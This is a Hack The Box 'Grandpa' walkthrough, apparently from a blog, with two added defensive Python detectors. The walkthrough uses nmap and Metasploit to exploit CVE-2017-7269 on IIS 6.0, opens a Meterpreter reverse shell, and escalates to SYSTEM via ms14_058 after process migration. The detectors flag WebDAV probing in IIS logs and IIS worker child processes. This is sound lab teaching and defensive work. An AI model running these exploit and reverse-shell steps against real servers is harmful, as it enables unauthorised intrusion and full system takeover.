Introduction
Hello. This is Ikkyu, who got a bit hyperventilated singing Ken Hirai's POPSTAR.
If you find any mistakes, please point them out.
Twitter: ikkyu (@ikk_hck)
Grandpa
SYNOPSIS
Grandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge.
nmap
nmap -sC -sV --script vuln -oA nmap 10.10.10.14
# Nmap 7.80SVN scan initiated Sun Oct 25 19:01:50 2020 as: nmap -sC -sV --script vuln -oA nmap 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.27s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /postinfo.html: Frontpage file or folder
| /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
| /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
| /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
| /_vti_bin/shtml.dll: Frontpage file or folder
|_ /_vti_bin/shtml.exe: Frontpage file or folder
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
| References:
|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-server-header: Microsoft-IIS/6.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:microsoft:internet_information_server:6.0:
| CVE-2017-7269 10.0 https://vulners.com/cve/CVE-2017-7269
| CVE-2008-0075 10.0 https://vulners.com/cve/CVE-2008-0075
| CVE-2001-0500 10.0 https://vulners.com/cve/CVE-2001-0500
| CVE-2009-3023 9.3 https://vulners.com/cve/CVE-2009-3023
| CVE-2008-1446 9.0 https://vulners.com/cve/CVE-2008-1446
| CVE-2010-1256 8.5 https://vulners.com/cve/CVE-2010-1256
| CVE-2009-1535 7.6 https://vulners.com/cve/CVE-2009-1535
| CVE-2007-2897 7.5 https://vulners.com/cve/CVE-2007-2897
| CVE-2008-0074 7.2 https://vulners.com/cve/CVE-2008-0074
| CVE-2006-0026 6.5 https://vulners.com/cve/CVE-2006-0026
| CVE-2009-4444 6.0 https://vulners.com/cve/CVE-2009-4444
| CVE-2005-2678 5.0 https://vulners.com/cve/CVE-2005-2678
| CVE-2003-0718 5.0 https://vulners.com/cve/CVE-2003-0718
| CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899
| CVE-2005-2089 4.3 https://vulners.com/cve/CVE-2005-2089
| CVE-2009-2521 2.6 https://vulners.com/cve/CVE-2009-2521
|_ CVE-2003-1582 2.6 https://vulners.com/cve/CVE-2003-1582
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 25 19:16:21 2020 -- 1 IP address (1 host up) scanned in 871.25 seconds
From the results we can see that the target machine is running Microsoft IIS httpd 6.0 and that it has known vulnerabilities.
Searching for an exploit
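From the defender's side, the footprint of this scan is visible in the IIS logs: the FrontPage paths under /_vti_bin/ are requested one by one, and the WebDAV overflow module used later in this write-up walks path lengths 3 to 60, one PROPFIND request each. The following is an added example, not code from the write-up or from Metasploit, that runs three rules over constructed IIS 6.0 W3C log lines (the default field layout); the rules, the burst threshold and the sample lines are my assumptions and should be tuned per server.

```python
"""Flag WebDAV/FrontPage probing in IIS 6 W3C extended log lines.

Added example, not code from the write-up. SAMPLE_LINES are constructed to
look like IIS 6.0 W3C logs (default field layout); the three rules and the
burst threshold are assumptions to be tuned per server.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "SEARCH"}
BURST_COUNT = 10                       # this many PROPFINDs from one client ...
BURST_WINDOW = timedelta(seconds=60)   # ... inside this window counts as a burst

# Constructed sample log: a FrontPage probe, a benign OPTIONS request from a
# second client, and a 12-request PROPFIND burst resembling the path-length
# walk the WebDAV module performs.
SAMPLE_LINES = [
    "#Software: Microsoft Internet Information Services 6.0",
    "#Version: 1.0",
    "#Date: 2020-10-26 11:05:00",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status",
    "2020-10-26 11:05:01 10.10.10.14 GET /default.htm - 80 - 10.10.14.6 Mozilla/5.0 200 0 0",
    "2020-10-26 11:05:02 10.10.10.14 GET /_vti_bin/shtml.dll - 80 - 10.10.14.6 Mozilla/5.0 404 0 2",
    "2020-10-26 11:05:03 10.10.10.14 OPTIONS / - 80 - 192.0.2.10 Microsoft-WebDAV-MiniRedir/6.1.7601 200 0 0",
] + [
    f"2020-10-26 11:09:{s:02d} 10.10.10.14 PROPFIND / - 80 - 10.10.14.6 - 500 0 0"
    for s in range(12)
]


def parse_w3c(lines):
    """Turn W3C extended log lines into dicts keyed by the #Fields header."""
    fields, records = None, []
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue                      # other directives (#Software, #Date, ...)
        values = line.split()             # IIS writes '+' for spaces inside a field
        if fields is None or len(values) != len(fields):
            continue                      # malformed line: skip rather than crash
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def detect(records):
    """Return (rule, client_ip, detail) findings for the three rules."""
    findings = []
    seen_dav = set()
    propfind_times = defaultdict(list)
    for r in records:
        method, ip, uri = r["cs-method"].upper(), r["c-ip"], r["cs-uri-stem"]
        # Rule 1: any WebDAV method, reported once per (client, method)
        if method in WEBDAV_METHODS and (ip, method) not in seen_dav:
            seen_dav.add((ip, method))
            findings.append(("webdav-method", ip, method))
        # Rule 2: FrontPage Server Extensions paths (the nmap http-enum hits above)
        if uri.lower().startswith("/_vti_bin/"):
            findings.append(("frontpage-probe", ip, uri))
        if method == "PROPFIND":
            propfind_times[ip].append(r["ts"])
    # Rule 3: BURST_COUNT PROPFINDs from one client inside BURST_WINDOW
    for ip, times in propfind_times.items():
        times.sort()
        for i in range(len(times) - BURST_COUNT + 1):
            if times[i + BURST_COUNT - 1] - times[i] <= BURST_WINDOW:
                span = int((times[-1] - times[0]).total_seconds())
                findings.append(("propfind-burst", ip,
                                 f"{len(times)} PROPFIND requests within {span}s"))
                break
    return findings


if __name__ == "__main__":
    for rule, ip, detail in detect(parse_w3c(SAMPLE_LINES)):
        print(f"{rule:16} {ip:16} {detail}")
```

The `If:` header that carries the overflow is not in the default log fields, so the detector keys on behaviour rather than payload: a server where WebDAV should be disabled (the actual mitigation for IIS 6) should log no PROPFIND at all, and a run of them from one client is the module's path-length walk.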
$ searchsploit IIS 6.0
/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | windows/remote/8765.php
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploit
Since something was found, start the Metasploit console.
$ msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v6.0.10-dev-7be36a772d ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: View all productivity tips with the tips command
Search again and use the second one.
msf6 > search IIS 6.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
1 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
2 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Check the required settings.
msf6 exploit(windows/firewall/blackice_pam_icq) > show options
Module options (exploit/windows/firewall/blackice_pam_icq):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1 yes The target port (UDP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Bruteforce
Set the remote host and local host IP addresses and run it.
msf6 exploit(windows/firewall/blackice_pam_icq) > set rhost 10.10.10.14
rhost => 10.10.10.14
msf6 exploit(windows/firewall/blackice_pam_icq) > set lhost 10.10.14.6
lhost => 10.10.14.6
msf6 exploit(windows/firewall/blackice_pam_icq) > run
[*] Started reverse TCP handler on 172.20.10.7:4444
[*] Trying target iis-pam1.dll 3.6.06 [5e0a47ef]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target iis-pam1.dll 3.6.11 [5e0da1db]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP3/SP4/SP5 [777e79ab]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP4/SP5 [7733b8db]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP5/SP6 - advapi32 [77dcd1cb]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP3/SP5/SP6 - shell32 [77cec080]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP5/SP6 - mswsock [7767ebca]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - shell32 [776606af]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - atl [76b305a7]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - atl [76e61a21]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - ws2_32 [71ab7bfb]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - mswsock [71a5403d]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Windows 2000 Pro SP4 English [7c2ec68b]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Win2000 SP0 - SP4 [750231e2]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Win2000 SP2/SP3 - samlib [75159da3]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Win2000 SP0/SP1 - activeds [77ed0beb]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Windows XP Pro SP0 English [77e3171b]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Windows XP Pro SP1 English [77dc5527]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0 - SP1 [71aa3a4b]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Win2003 SP0 [71bf3cc9]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Exploit completed, but no session was created.
It didn't work even after several attempts, so I'll use the third one.
msf6 exploit(windows/firewall/blackice_pam_icq) > search IIS 6.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
1 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
2 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/firewall/blackice_pam_icq) > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
Configure it the same way as before and run it.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.14
rhost => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.6
lhost => 10.10.14.6
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.14:1030) at 2020-10-26 20:09:37 +0900
meterpreter >
Success.
meterpreter > getuid
[-] 1055: Operation failed: Access is denied.
PE (privilege escalation)
But it looks like we don't have enough privileges...
Go back to msf, point local_exploit_suggester at the session with the target machine and run it.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 35 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Several candidates come up; I'll use exploit/windows/local/ms14_058_track_popup_menu. I haven't tried the others.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Check the settings and run it.
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options
Module options (exploit/windows/local/ms14_058_track_popup_menu):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.6
lhost => 10.10.14.6
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError 1054: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
It seems to have failed. Judging from other write-ups, it works if you change the process. I'll explain the reason later.
First go back to the machine and check the processes with ps.
msf6 exploit(windows/local/ms14_058_track_popup_menu) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
616 396 svchost.exe
680 396 svchost.exe
736 396 svchost.exe
764 396 svchost.exe
800 396 svchost.exe
936 396 spoolsv.exe
964 396 msdtc.exe
1076 396 cisvc.exe
1116 396 svchost.exe
1176 396 inetinfo.exe
1216 396 svchost.exe
1328 396 VGAuthService.exe
1408 396 vmtoolsd.exe
1456 396 svchost.exe
1596 396 svchost.exe
1700 396 alg.exe
1812 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1912 396 dllhost.exe
2308 616 wmiprvse.exe
2812 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2884 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2936 2812 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
PIDs 1812, 2812 and 2884 are running as NT AUTHORITY\NETWORK SERVICE, so I migrate to process 1812 and then check the privileges.
meterpreter > migrate 1812
[*] Migrating from 2936 to 1812...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
The username is now NT AUTHORITY\NETWORK SERVICE, so the privileges are higher than before. Move to the root directory, start a shell and look at the directories.
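The process listing above also shows what a defender would look for: the Meterpreter payload is living in rundll32.exe (PID 2936) whose parent is the IIS worker w3wp.exe (PID 2812), and an IIS worker spawning rundll32.exe or cmd.exe is a strong indicator that a request handler was exploited. The following is an added example, not code from the write-up or from Metasploit, that parses a Meterpreter-style ps table (the one above, re-typed as a constructed sample), flags children of IIS worker processes and prints the ancestry chain for context; the line regex and the worker set are my assumptions.

```python
"""Find child processes of IIS worker processes in a Meterpreter `ps` listing.

Added example, not from the write-up. PS_OUTPUT is the process table shown
in the write-up, re-typed as a constructed sample; the line regex, the IIS
worker set and the output format are assumptions.
"""
import re
from typing import NamedTuple, Optional


class Proc(NamedTuple):
    pid: int
    ppid: int
    name: str
    user: Optional[str]
    path: Optional[str]


# IIS 6 request-handling processes (assumption: tune to the server role)
IIS_WORKERS = {"w3wp.exe", "inetinfo.exe", "davcdata.exe"}

# PID PPID Name [Arch Session [User] Path]: User may contain spaces, Path may not
LINE_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\[[^\]]*\]|\S+)"
    r"(?:\s+(?P<arch>x86|x64)\s+(?P<session>\d+)(?:\s+(?P<user>.*?))?"
    r"\s+(?P<path>[A-Za-z]:\\\S*))?\s*$"
)

# Constructed sample: the first `ps` listing from the write-up
PS_OUTPUT = r"""
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
616 396 svchost.exe
680 396 svchost.exe
736 396 svchost.exe
764 396 svchost.exe
800 396 svchost.exe
936 396 spoolsv.exe
964 396 msdtc.exe
1076 396 cisvc.exe
1116 396 svchost.exe
1176 396 inetinfo.exe
1216 396 svchost.exe
1328 396 VGAuthService.exe
1408 396 vmtoolsd.exe
1456 396 svchost.exe
1596 396 svchost.exe
1700 396 alg.exe
1812 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1912 396 dllhost.exe
2308 616 wmiprvse.exe
2812 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2884 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2936 2812 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
"""


def parse_ps(text):
    """Map PID -> Proc; header, rule and blank lines do not match and are skipped."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        procs[int(m["pid"])] = Proc(int(m["pid"]), int(m["ppid"]), m["name"],
                                    m["user"] or None, m["path"])
    return procs


def find_suspicious(procs):
    """Children of IIS worker processes as (pid, name, parent_pid, parent_name)."""
    hits = []
    for p in sorted(procs.values(), key=lambda p: p.pid):
        parent = procs.get(p.ppid)
        if parent and parent.name.lower() in IIS_WORKERS:
            hits.append((p.pid, p.name, parent.pid, parent.name))
    return hits


def ancestry(procs, pid):
    """Parent chain as 'name(pid)' strings; stops at a cycle or unknown PID."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        p = procs[pid]
        chain.append(f"{p.name}({p.pid})")
        pid = p.ppid
    return chain


if __name__ == "__main__":
    procs = parse_ps(PS_OUTPUT)
    for pid, name, ppid, pname in find_suspicious(procs):
        print(f"{pname}({ppid}) spawned {name}({pid}): " + " <- ".join(ancestry(procs, pid)))
```

On the sample the only hit is rundll32.exe under w3wp.exe; the later cmd.exe shells ("Process 2744 created") would show up the same way once they exist. The same parent-child rule is what a host agent or Sysmon process-creation telemetry would apply to a live server.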
meterpreter > cd /
meterpreter > shell
Process 2744 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\
04/12/2017 04:27 PM <DIR> ADFS
04/12/2017 04:04 PM 0 AUTOEXEC.BAT
04/12/2017 04:04 PM 0 CONFIG.SYS
04/12/2017 04:32 PM <DIR> Documents and Settings
04/12/2017 04:17 PM <DIR> FPSE_search
04/12/2017 04:17 PM <DIR> Inetpub
12/24/2017 07:18 PM <DIR> Program Files
12/24/2017 07:27 PM <DIR> WINDOWS
04/12/2017 04:05 PM <DIR> wmpub
2 File(s) 0 bytes
7 Dir(s) 18,091,909,120 bytes free
Looking around, we find Administrator under Documents and Settings, but we don't seem to have access to it.
C:\>cd "Documents and Settings"
cd "Documents and Settings"
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:12 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 04:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 18,091,880,448 bytes free
C:\Documents and Settings>cd Administrator
cd Administrator
Access is denied.
So I change the process to migrate to 2812 and run the exploit again.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
616 396 svchost.exe
680 396 svchost.exe
736 396 svchost.exe
764 396 svchost.exe
800 396 svchost.exe
936 396 spoolsv.exe
964 396 msdtc.exe
1076 396 cisvc.exe
1116 396 svchost.exe
1176 396 inetinfo.exe
1216 396 svchost.exe
1316 1076 cidaemon.exe
1328 396 VGAuthService.exe
1408 396 vmtoolsd.exe
1456 396 svchost.exe
1596 396 svchost.exe
1700 396 alg.exe
1812 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1912 396 dllhost.exe
2060 1076 cidaemon.exe
2116 348 logon.scr
2164 1076 cidaemon.exe
2308 616 wmiprvse.exe
2812 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2884 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2812
[*] Migrating from 1812 to 2812...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Launching notepad to host the exploit...
[+] Process 2044 launched.
[*] Reflectively injecting the exploit DLL into 2044...
[*] Injecting exploit into 2044...
[*] Exploit injected. Injecting payload into 2044...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.6:4444 -> 10.10.10.14:1033) at 2020-10-26 20:37:32 +0900
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
The username has changed to NT AUTHORITY\SYSTEM. We can now also access the directory from before.
meterpreter > shell
Process 3008 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of c:\
04/12/2017 04:27 PM <DIR> ADFS
04/12/2017 04:04 PM 0 AUTOEXEC.BAT
04/12/2017 04:04 PM 0 CONFIG.SYS
04/12/2017 04:32 PM <DIR> Documents and Settings
04/12/2017 04:17 PM <DIR> FPSE_search
04/12/2017 04:17 PM <DIR> Inetpub
12/24/2017 07:18 PM <DIR> Program Files
12/24/2017 07:27 PM <DIR> WINDOWS
04/12/2017 04:05 PM <DIR> wmpub
2 File(s) 0 bytes
7 Dir(s) 18,091,823,104 bytes free
c:\>cd "Documents and Settings"
cd "Documents and Settings"
c:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of c:\Documents and Settings
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:12 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 04:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 18,091,823,104 bytes free
c:\Documents and Settings>cd Administrator
cd Administrator
c:\Documents and Settings\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of c:\Documents and Settings\Administrator
04/12/2017 04:12 PM <DIR> .
04/12/2017 04:12 PM <DIR> ..
04/12/2017 04:28 PM <DIR> Desktop
04/12/2017 04:12 PM <DIR> Favorites
04/12/2017 04:12 PM <DIR> My Documents
04/12/2017 03:42 PM <DIR> Start Menu
04/12/2017 03:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 18,091,819,008 bytes free
c:\Documents and Settings\Administrator>cd Desktop
cd Desktop
c:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of c:\Documents and Settings\Administrator\Desktop
04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 04:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,091,819,008 bytes free
Found root.txt on the Administrator's Desktop. Good work.
